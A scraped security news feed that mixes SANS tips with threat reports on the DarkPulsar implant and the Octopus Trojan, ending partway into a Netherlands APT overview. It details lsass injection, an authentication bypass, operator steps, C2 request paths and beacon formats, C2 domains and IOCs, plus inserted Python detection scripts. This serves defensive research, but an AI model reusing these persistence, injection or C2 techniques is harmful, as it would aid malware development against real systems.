Malware RSS Feed

Shopping Online

SANS Tip of the Day - 14 hours 49 min ago
When shopping online, always use your credit cards instead of a debit card. If any fraud happens, it is far easier to recover your money from a credit card transaction. Gift cards and one-time-use credit card numbers are even more secure.

DarkPulsar FAQ

Malware Alerts - Fri, 10/19/2018 - 06:00

What’s it all about?

In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The FuzzBunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together they form a very powerful cyber-espionage platform.

How was this implant discovered?

We analyze every leak containing malicious software in order to provide the best detection, and we did the same after the “Lost in Translation” leak was published. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. On analysis it turned out not to be a backdoor itself but only the administrative part. We also noticed some magic constants in this administrative module, and having created signatures based on them, we were able to catch the implant itself.

What exactly can this implant be used for?

This implant supports 7 commands:

  • Burn – for self-deletion.
  • RawShellcode – to execute arbitrary position-independent code.
  • EDFStagedUpload – Exploit Development Framework Staged Upload. Step by step it deploys DanderSpritz payloads into the victim’s memory without touching the disk. After this command is executed, the administrator can send any of the many DanderSpritz commands to the victim. (View details in the technical part of this report.)
  • DisableSecurity – disables NTLM protocol security. With the help of this command, the malware administrator does not need to know a valid victim username and password to pass authentication: the system will accept any arbitrary pair as valid. (View details in the technical part of this report.)
  • EnableSecurity – the opposite of DisableSecurity.
  • UpgradeImplant – installs a new version of the backdoor.
  • PingPong – tests communication.

The most interesting are DisableSecurity and EnableSecurity.

How many victims?

We found around 50 victims, but believe the figure was much higher while the FuzzBunch and DanderSpritz frameworks were in active use. We think so because the DanderSpritz interface allows many victims to be managed at the same time. A second point supporting this is that after stopping a cyber-espionage campaign, malware owners often delete their malware from victim computers, so the 50 victims are very probably just the ones the attackers forgot about.

Which countries?

All victims were located in Russia, Iran and Egypt, and the infected machines were typically running Windows Server 2003/2008. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

What about the attack duration? Does it last long?

DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?

We think that after the “Lost in Translation” leak the espionage campaign was stopped, but that does not mean all computers are rid of this backdoor. We cured all our users. For users without our protection, we have several tips on how to check whether a system is infected and how to cure it yourself. Note that to use this backdoor on infected victims, an attacker needs the private RSA key that pairs with the public key embedded in the backdoor, so nobody except the original DarkPulsar operators can use compromised systems through it.

How to protect against this threat?

We can detect this threat with different technologies.

However, the standard recommendations remain the same:

  • Keep your security products up to date
  • Do not turn security product components off
  • Keep your OS updated
  • Install all security patches asap
  • Use special traffic analysis tools and pay attention to all encrypted traffic
  • Do not use weak passwords or the same password for several endpoints
  • Use complex passwords
  • Do not allow remote connections to endpoints with administration rights
  • Do not allow domain administrators to be local administrators with the same credentials

Which proactive technologies do you have to protect users against such threats?

We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.

Who is behind this threat?

We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.

How was this implant used? Was it created for stealing money or just information?

We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.

DarkPulsar

Malware Alerts - Fri, 10/19/2018 - 06:00

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windowed interface similar to botnet administrative panels, as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for victims that are not controlled via FuzzBunch.

DanderSpritz interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

  • %pluginName%-version.fb

This is the utility file of the framework. It duplicates the header from the XML file and includes the plugin’s ID.

  • %pluginName%-version.exe

This executable file is launched when FuZZbuNch receives the command to do so.

  • %pluginName%-version.xml

This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting FuzzBunch categories is called ImplantConfig and includes plugins designed to control infected machines via an implant at the post-exploitation stage. DarkPulsar belongs to this category: it is the administrative module for a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

It supports the following commands:

  • Burn
  • RawShellcode
  • EDFStagedUpload
  • DisableSecurity
  • EnableSecurity
  • UpgradeImplant
  • PingPong

Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant.

We thought these constants would probably also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor, and later we were able to find both 32-bit and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights

The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

  1. Two nameless functions used to install the backdoor in the system.
  2. Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
  3. A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.

The implementations of the SSPI and TSPI interfaces are minimalistic: the functions exported by DarkPulsar have the same names as the interface functions, but they contain malicious code instead of a telephony service.

The implant is installed in the system by the nameless exported function. The backdoor is launched by calling AddSecurityPackage (from secur32.dll) with administrator privileges, passing the path to its own library as the parameter. This causes lsass.exe to load DarkPulsar as an SSP/AP and to call its exported function SpLsaModeInitialize, which DarkPulsar uses to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. The installer also adds the library name under HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers.

That key is read at start-up by the Telephony API service (TapiSrv), which is launched alongside the Remote Access Connection Manager (RasMan) service with its startup type set to “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion, which contains the AddSecurityPackage call that performs the injection into lsass.exe.

DarkPulsar implements its payload by installing hooks on SpAcceptLsaModeContext, the function responsible for authentication. These hooks are placed in several system authentication packages inside the lsass.exe process and allow DarkPulsar to control the authentication process for the following protocols:

  • Msv1_0.dll – for the NTLM protocol,
  • Kerberos.dll – for the Kerberos protocol,
  • Schannel.dll – for the TLS/SSL protocols,
  • Wdigest.dll – for the Digest protocol, and
  • Lsasrv.dll – for the Negotiate protocol.

After this, DarkPulsar is able to embed its traffic into system protocols. Since this network activity follows the standard system code paths, it is only reflected in the System process: the implant uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling the authentication process is the ability to bypass the need for a valid username and password when accessing objects that require authentication, such as the process list, the remote registry or the file system over SMB. After DarkPulsar’s DisableSecurity command is sent, the backdoor’s hooks on the victim side will always report from SpAcceptLsaModeContext that the supplied credentials are valid, and on that basis the system grants the client access to protected objects.

Working with DarkPulsar

Darkpulsar-1.1.0.exe is the administrative interface, working on the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar-1.1.0.9.xml or as command-line arguments, detailing at least:

  • whether the target machine runs a 32-bit or 64-bit system;
  • the protocol used to deliver the command (SMB, NBT, SSL and RDP are supported) and the port number;
  • the private RSA key used to decrypt the session AES key.

Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. It is a plugin of the FuzzBunch framework, which manages parameters and coordinates the different components. This is what the DisableSecurity command looks like in FuzzBunch:

Below is an example of ProcessList after DisableSecurity, which allows any plugin to be executed without valid credentials, operating via regular system functions (the remote registry service):

DanderSpritz

DanderSpritz is the framework for controlling infected machines. It differs from FuZZbuNch in that the latter provides a limited toolkit for the post-exploitation stage, with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

DanderSpritz, by contrast, works with a larger range of backdoors, using PeddleCheap on the victim side to let operators launch plugins. PeddleCheap is a DanderSpritz plugin that can be used to configure implants and connect to infected machines. Once a connection is established, all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (a FuzzBunch plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence the full name of PCDllLauncher: ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the PeddleCheap plugin via FuZZbuNch with the DarkPulsar and PCDllLauncher plugins consists of four steps:

  1. Via FuZZbuNch, run the EDFStagedUpload command to launch DarkPulsar.
  2. In DanderSpritz, run the pc_prep (PeddleCheap Preparation) command to prepare the payload and the library to be launched on the implant side.
  3. In DanderSpritz, run the pc_old command (an alias of pc_listen -reuse -nolisten -key Default), which sets it to wait for a socket from PcDllLauncher.
  4. Launch PcDllLauncher via FuZZbuNch and specify the path to the payload prepared with pc_prep in the ImplantFilename parameter.

DanderSpritz File System plugin

Conclusions

The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attack platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealth. The implementation of these capabilities, such as encapsulating its traffic in legitimate protocols and bypassing the need to enter credentials to pass authentication, is highly professional.

Our product can completely remove the malware related to this attack.

Detecting malicious network activity

When EDFStagedUpload is executed on an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

IOCs

implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
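As an added example (not Kaspersky's code and not part of the original post), the Python below turns the three IOCs into a repeatable host check: it parses a `reg export` of the Telephony\Providers key, flags any telephony service provider that is not in a baseline of Microsoft-shipped TSPs, and compares file hashes with the implant's MD5. The baseline list, the sample export and the stand-in file bytes are assumptions constructed for the example; on a real host you would feed it the real export and the real files under %SystemRoot%\System32.

```python
"""Hunt for DarkPulsar persistence artefacts from the IOCs in the report.

Added example, not Kaspersky tooling. Inputs here are constructed: a .reg
export of the TSP provider key and an in-memory map of file bytes.
"""
import hashlib
import re

# IOCs from the report.
DARKPULSAR_MD5 = "96f10cfa6ba24c9ecd08aa6d37993fe4"
DARKPULSAR_FILENAME = "sipauth32.tsp"
PROVIDERS_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers"

# Assumed baseline of Microsoft-shipped TSPs (tune it to your own build);
# any other file registered as a provider deserves a look.
KNOWN_TSPS = {
    "unimdm.tsp", "kmddsp.tsp", "ndptsp.tsp", "hidphone.tsp",
    "h323.tsp", "ipconf.tsp", "remotesp.tsp",
}

_PROVIDER_RE = re.compile(r'^"ProviderFileName(\d+)"="(.+)"\s*$')

# Constructed sample export; the third provider is what DarkPulsar leaves behind.
SAMPLE_REG_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\Providers]
"NumProviders"=dword:00000003
"ProviderID0"=dword:00000001
"ProviderFileName0"="unimdm.tsp"
"ProviderID1"=dword:00000002
"ProviderFileName1"="kmddsp.tsp"
"ProviderID2"=dword:00000003
"ProviderFileName2"="sipauth32.tsp"
"""


def parse_providers(reg_text: str) -> dict:
    """Return {index: provider file name} from a .reg export of the key."""
    providers = {}
    for line in reg_text.splitlines():
        m = _PROVIDER_RE.match(line.strip())
        if m:
            providers[int(m.group(1))] = m.group(2).strip().lower()
    return providers


def suspicious_providers(providers: dict, baseline=KNOWN_TSPS) -> list:
    """Providers outside the baseline, in registration order."""
    return [name for _, name in sorted(providers.items()) if name not in baseline]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def hunt(reg_text: str, files: dict) -> list:
    """files maps a lower-cased file name to its bytes (read from System32)."""
    findings = []
    for name in suspicious_providers(parse_providers(reg_text)):
        findings.append(f"unexpected TSP registered under {PROVIDERS_KEY}: {name}")
        if name == DARKPULSAR_FILENAME:
            findings.append(f"TSP name matches DarkPulsar IOC: {name}")
    for name, data in files.items():
        if md5_hex(data) == DARKPULSAR_MD5:
            findings.append(f"MD5 matches DarkPulsar implant: {name}")
    return findings


if __name__ == "__main__":
    # Constructed stand-in content, so the hash check will not fire here.
    for finding in hunt(SAMPLE_REG_EXPORT, {"sipauth32.tsp": b"not the real sample"}):
        print(finding)
```

Produce the export with `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers" providers.reg` (the file is UTF-16; open it with that encoding before passing the text in). The registration check matters more than the hash: a recompiled implant changes the MD5, and because the SSP/AP is loaded at runtime via AddSecurityPackage rather than through the Security Packages registry value, the TSP entry is the durable artefact on disk.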

Browse With Encryption

SANS Tip of the Day - Thu, 10/18/2018 - 01:00
When browsing online, encrypting your online activities is one of the best ways to protect yourself. Make sure your online connection is encrypted by making sure HTTPS is in the website address and/or that there is a lock next to it.

Octopus-infested seas of Central Asia

Malware Alerts - Mon, 10/15/2018 - 06:00

For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities.

The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using the Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. In our telemetry we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking), plus Afghanistan.

In the case of Octopus, DustSquad used Delphi as their programming language of choice, which is unusual for such an actor. Other exceptions are the Russian-language Zebrocy (Sofacy’s Delphi malware), the Hindi-language DroppingElephant and the Turkish-language StrongPity. Although we detected Octopus victims that were also infected with Zebrocy/Sofacy, we didn’t find any strong similarities and we don’t consider the two actors to be related.

What happened?

In April 2018 we discovered a new Octopus sample pretending to be communication software for a Kazakh opposition political group. The malware is packed into a ZIP file named dvkmailer.zip with a timestamp from February-March 2018. DVK stands for Democratic Choice of Kazakhstan, an opposition political party that is banned in the country. The image below shows the acronym ‘ДВК’ in Russian (Демократический Выбор Казахстана). DVK enjoys a healthy Telegram presence, making Telegram’s potential ban a hot topic in Kazakhstan. The dropper pretends to be Telegram Messenger with a Russian interface.

We couldn’t find any legitimate software that this malware appears to be impersonating; in fact, we don’t believe it exists. The Trojan uses third-party Delphi libraries such as The Indy Project for JSON-based C2 communications and TurboPower Abbrevia (sourceforge.net/projects/tpabbrevia) for compression. Malware persistence is basic and achieved via the system registry. The server side uses commercial hosting in different countries with .php scripts deployed. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen. For more information, please contact: intelreports@kaspersky.com.

Technical details

The attackers used the potential Telegram ban in Kazakhstan to push their dropper as alternative communication software for the political opposition.

‘Telegram messenger’ establishes network module persistence in the simplest way and starts the module

We can’t confirm how this malware is being distributed, although it clearly uses some form of social engineering. This actor previously used spear phishing to spread malware.

Dropper
  MD5 hash: 979eff03faeaeea5310df53ee1a2fc8e
  Name: dvkmailer.zip
  Archive contents:
    d6e813a393f40c7375052a15e940bc67  CsvHelper.dll           Legitimate .NET CSV file parser
    664a15bdc747c560c11aa0cf1a7bf06e  Telegram Messenger.exe  Persistence and launcher
    87126c8489baa8096c6f30456f5bef5e  TelegramApi.dll         Network module
    d41d8cd98f00b204e9800998ecf8427e  Settings.json           Empty

Launcher
  MD5 hash: 664a15bdc747c560c11aa0cf1a7bf06e
  File name: Telegram Messenger.exe
  PE timestamp: 2018.03.18 21:34:12 (GMT)
  Linker version: 2.25 (Embarcadero Delphi)

Before any user interaction, inside the FormCreate() function the launcher checks for a file named TelegramApi.dll in the same directory. If it exists, the launcher copies the network module to the Startup directory as Java.exe and runs it.

The ‘Send mailing’ button in the bottom right corner doesn’t even have a handler function

Delphi Visual Component Library (VCL) programs are based on event handlers for form elements. Such programs are extremely large (about 2.6 MB and 12,000 functions), but nearly all of this code handles the visual components and run-time libraries. There are only three programmer-defined handlers for controlling elements inside the Octopus launcher.

Function name / Functionality
  FormCreate() – Runs as the constructor before any user activity. Makes the network module persistent via the Startup directory and runs it
  Button1Click() – Shows the explorer dialog window to choose the “mailing file”
  DateTimePicker1Click() – Shows a calendar to select the “mailing date”

There is no handler for the ‘Send mailing’ button, so the launcher pretends to be an alternative communicator that in reality does nothing. This may be because the malware is still unfinished; after all, messages sent through it could be of value to the attackers. However, we believe it is more likely that the malware was created in a hurry and the attackers decided to skip any communication features.

Network module

C2 communication scheme

Network module
  MD5 hash: 87126c8489baa8096c6f30456f5bef5e
  File name: TelegramApi.dll
  PE timestamp: 2018.02.06 11:09:28 (GMT)
  Linker version: 2.25 (Embarcadero Delphi)

Despite the file extension, this network module is a self-sufficient portable executable file and not a dynamic-link library. The first sample checks for files with names like 1?????????.* in the user’s temporary folder and deletes any files it finds. Then it creates .profiles.ini in the Application Data directory, where the malware stores its log.

HTTP request / Response
  GET /d.php?check – JSON “ok”
  GET /d.php?servers – JSON domain name
  GET /i.php?check= – JSON “ok”
  POST /i.php?query= – JSON response code or command, depending on the POST data

First stage .php script to check connection and get C2 domain name

All network modules contain hardcoded IP addresses belonging to commercial web-hosting services based in different countries. The operators simply deploy their first-stage .php script on them, which checks the connection and returns the actual C2 server domain name in response to an HTTP GET request.

After the initial connection check, the malware receives a JSON with the actual C2 domain name

Then the network module checks against the hardcoded victim’s id

The network module checks against a 32-digit hardcoded victim id and sends the gathered data to the C2 using an HTTP POST request. In terms of programming, this id is strange, because the malware simultaneously ‘fingerprints’ its victim with an MD5 hash of its system data.

JSON-based gathered data sent in a base64-encoded HTTP POST request

All communication with the C2s is based on JSON-formatted data over HTTP. For this, the developers used the publicly available The Indy Project library (indyproject.org) as well as the third-party TurboPower Abbrevia (sourceforge.net/projects/tpabbrevia) for compression.

After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as the computer and user name, Windows directory, host IP, etc. One interesting field is "vr":"2.0", which appears to be the malware version encoded in the communication protocol.

The ‘id’ field is the victim’s fingerprint, for which the malware actively uses the Windows Management Instrumentation mechanism. The Trojan runs WMIC.exe with the following arguments:

  C:\WINDOWS\system32\wbem\WMIC.exe computersystem get Name /format:list
  C:\WINDOWS\system32\wbem\WMIC.exe os get installdate /format:list
  C:\WINDOWS\system32\wbem\WMIC.exe path CIM_LogicalDiskBasedOnPartition get Antecedent,Dependent

Then the module concatenates the gathered ids and computes an MD5 hash, which becomes the victim’s final id. The “act” field numbers the communication stage (0 for initial fingerprinting). After this, the HTTP POST control server returns the JSON {"rt":"30"} and the client continues with the next “act” in the HTTP POST:

At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host.
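The request sequence and the beacon format above are enough to write a detection that does not depend on the hardcoded IPs. The Python below is an added example (not DustSquad's malware nor Kaspersky's detection logic): it classifies proxy-log requests into the four stages the report lists, decodes the base64-over-JSON POST body, and reports whether one client walked the whole chain in order. The log line layout, the client address, the beacon fields beyond id/vr/act and the sample values are constructed assumptions; the paths and the id/vr/act field names come from the report.

```python
"""Flag Octopus C2 traffic in a proxy log and decode a beacon.

Added example, not part of the original post. Log format and sample
values are constructed; request paths and JSON field names follow the
report.
"""
import base64
import json
import re

# Request shapes from the report, in the order the network module makes them.
STAGES = [
    ("check",   "GET",  re.compile(r"^/d\.php\?check$")),
    ("servers", "GET",  re.compile(r"^/d\.php\?servers$")),
    ("c2check", "GET",  re.compile(r"^/i\.php\?check=")),
    ("beacon",  "POST", re.compile(r"^/i\.php\?query=")),
]


def classify(method: str, path: str):
    """Return the stage name for a request, or None if it is not Octopus-like."""
    for stage, m, rx in STAGES:
        if method == m and rx.search(path):
            return stage
    return None


def decode_beacon(b64: str) -> dict:
    """POST bodies are base64 over JSON; insist on the fields the report names."""
    doc = json.loads(base64.b64decode(b64).decode("utf-8"))
    if "id" not in doc or "act" not in doc:
        raise ValueError("not an Octopus beacon")
    return doc


# Constructed beacon: 32-hex-digit victim id, version 2.0, act 0 = fingerprinting.
SAMPLE_BEACON = base64.b64encode(json.dumps({
    "id": "0123456789abcdef0123456789abcdef",
    "vr": "2.0",
    "act": 0,
    "pc": "WS-01",        # assumed host-info fields
    "user": "analyst",
}).encode()).decode()

# Constructed proxy lines: client method host path [base64 body]
SAMPLE_LOG = [
    "10.0.0.5 GET 185.106.120.27 /d.php?check",
    "10.0.0.5 GET 185.106.120.27 /d.php?servers",
    "10.0.0.5 GET porenticofacts.com /i.php?check=",
    f"10.0.0.5 POST porenticofacts.com /i.php?query= {SAMPLE_BEACON}",
    "10.0.0.9 GET example.org /index.php?check",   # benign look-alike
]


def scan(lines):
    """Return (client, stage, detail) for every request that matches a stage."""
    hits = []
    for line in lines:
        parts = line.split(maxsplit=4)
        if len(parts) < 4:
            continue
        client, method, host, path = parts[:4]
        stage = classify(method, path)
        if stage is None:
            continue
        detail = host
        if stage == "beacon" and len(parts) == 5:
            b = decode_beacon(parts[4])
            detail = f"{host} id={b['id']} vr={b.get('vr')} act={b['act']}"
        hits.append((client, stage, detail))
    return hits


def full_chain(hits, client) -> bool:
    """True if the client performed all four stages in the documented order."""
    seen = [s for c, s, _ in hits if c == client]
    return seen == [s for s, _, _ in STAGES]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("full chain from 10.0.0.5:", full_chain(found, "10.0.0.5"))
```

Matching on the path pair (a `d.php` check followed by an `i.php` POST to a different host) is what survives a change of hosting provider; the `/index.php?check` line shows why the expressions are anchored rather than substring matches.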

Other software

Besides the Trojan itself, the Octopus developers used the password dumping utility fgdump.

Infrastructure (MD5 hash / IPs / C2 domain)
  87126c8489baa8096c6f30456f5bef5e – 185.106.120.27, 204.145.94.10 – porenticofacts.com
  ee3c829e7c773b4f94b700902ea3223c, 38f30749a87dcbf156689300737a094e – 185.106.120.240, 204.145.94.101 – certificatesshop.com
  6e85996c021d55328322ce8e93b31088 – 5.188.231.101, 103.208.86.238 – blondehairman.com
  7c0050a3e7aa3172392dcbab3bb92566 – 5.8.88.87, 103.208.86.237 – latecafe.in
  2bf2f63c927616527a693edf31ecebea – 85.93.31.141, 104.223.20.136 – hovnanflovers.com
  d9ad277eb23b6268465edb3f68b12cb2 – 5.188.231.101, 103.208.86.238 – blondehairman.com

The most recent samples (2017-2018) with the hardcoded IPs and the web domains obtained from the .php script

Conclusions

Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently DustSquad (with Octopus malware). Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.

Indicators of compromise

File hashes

87126c8489baa8096c6f30456f5bef5e
ee3c829e7c773b4f94b700902ea3223c
38f30749a87dcbf156689300737a094e
6e85996c021d55328322ce8e93b31088
7c0050a3e7aa3172392dcbab3bb92566
2bf2f63c927616527a693edf31ecebea
d9ad277eb23b6268465edb3f68b12cb2

Domains and IPs

85.93.31.141
104.223.20.136
5.8.88.87
103.208.86.237
185.106.120.240
204.145.94.101
5.188.231.101
103.208.86.238
185.106.120.27
204.145.94.10
hovnanflovers.com
latecafe.in
certificatesshop.com
blondehairman.com
porenticofacts.com

Auxiliary URLs to upload/download files:

www.fayloobmennik.net/files/save_new.html
http://uploadsforyou.com/download/
http://uploadsforyou.com/remove/

The following are old indicators of compromise no longer used by this actor, but which can be used for forensic purposes:

031e4900715564a21d0217c22609d73f
1610cddb80d1be5d711feb46610f8a77
1ce9548eae045433a0c943a07bb0570a
3a54b3f9e9bd54b4098fe592d805bf72
546ab9cdac9a812aab3e785b749c89b2
5cbbdce774a737618b8aa852ae754251
688854008f567e65138c3c34fb2562d0
6fda541befa1ca675d9a0cc310c49061
73d5d104b34fc14d32c04b30ce4de4ae
88ad67294cf53d521f8295aa1a7b5c46
a90caeb6645b6c866ef60eb2d5f2d0c5
ae4e901509b05022bbe7ef340f4ad96c
ca743d10d27277584834e72afefd6be8
ce45e69eac5c55419f2c30d9a8c9104b
df392cd03909ad5cd7dcea83ee6d66a0
e149c1da1e05774e6b168b6b00272eb4
f625ba7f9d7577db561d4a39a6bb134a
fc8b5b2f0b1132527a2bcb5985c2fe6b
f7b1503a48a46e3269e6c6b537b033f8
4f4a8898b0aa4507dbb568dca1dedd38

First stage .php script placed at:

148.251.185.168
185.106.120.46
185.106.120.47
46.249.52.244
5.255.71.84
5.255.71.85
88.198.204.196
92.63.88.142

Domains returned by .php script:

giftfromspace.com
mikohanzer.website
humorpics.download
desperados20.es
prom3.biz.ua
Reporting an Incident

SANS Tip of the Day - Mon, 10/15/2018 - 01:00
Bad guys are very persistent, eventually anyone can make a mistake. If a phone call from the "Help Desk" doesn't sound quite right, if an email seems suspicious or if a program you installed starts acting funny, ask for help! In addition, perhaps you lost a work laptop or a USB drive. The sooner you report an incident, the sooner we can help resolve the problem.

Securely Disposing Mobile Devices

SANS Tip of the Day - Fri, 10/12/2018 - 01:00
Do you plan on giving away or selling one of your older mobile devices? Make sure you wipe or reset your device before disposing of it. If you don't, the next person who owns it will have access to all of your accounts and personal information.

    Threats in the Netherlands

    Malware Alerts - Thu, 10/11/2018 - 03:30

    Introduction

    On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle-East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

    Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

    One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.

    Methodology

    For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

    In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

    The table below describes the number of tags that were hit per IP.

    0 10,532 1 1,149 2 618 3 344 4 234 >4 938

    One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

    The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept; if not, we tried to find out which organization the IP belonged to.

    At this point, for the entries that remained, the raw requests were retrieved and compared against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie it to a company or institution. If this succeeded, the entry was kept and marked as a TP.

    We also checked our APT reports for targets in the Netherlands and added these results to the review.

    Results

    Using the methods described above, we found the following APTs that are or have been active in the Netherlands:

    BlackOasis

